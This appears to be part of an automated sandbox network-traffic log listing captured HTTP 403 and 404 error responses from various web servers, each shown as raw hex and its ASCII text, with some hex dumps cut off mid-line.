              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:26:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 15 Sep 2023 05:27:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 15 Sep 2023 05:27:22 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:22 GMTContent-Type: text/htmlContent-Length: 75193Connection: keep-aliveVary: Accept-EncodingETag: "61e91823-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1229date: Fri, 15 Sep 2023 05:27:21 GMTserver: LiteSpeedx-hostname: ams111.yourwebhoster.comData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 15 Sep 2023 05:27:22 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: 027ff19b-edb0-48a2-9ff7-412d5aa3347fCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hXAOHxy%2Bq3aiWDm8tWS5AKsiKvbMkC0vfplgjaBUvtvLbFluX1VkSLVZd01AxVkff9btK3RbdsCcg5gb66hbWXwwviypH9n4sSwKxEFvg9YXJ2KZJP0ze8t7JF8Q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=72.000027Server: cloudflareCF-RAY: 806e75cd4805c477-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Fri, 15 Sep 2023 05:27:22 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: i1NbDyK7/tRN974ETData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:22 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
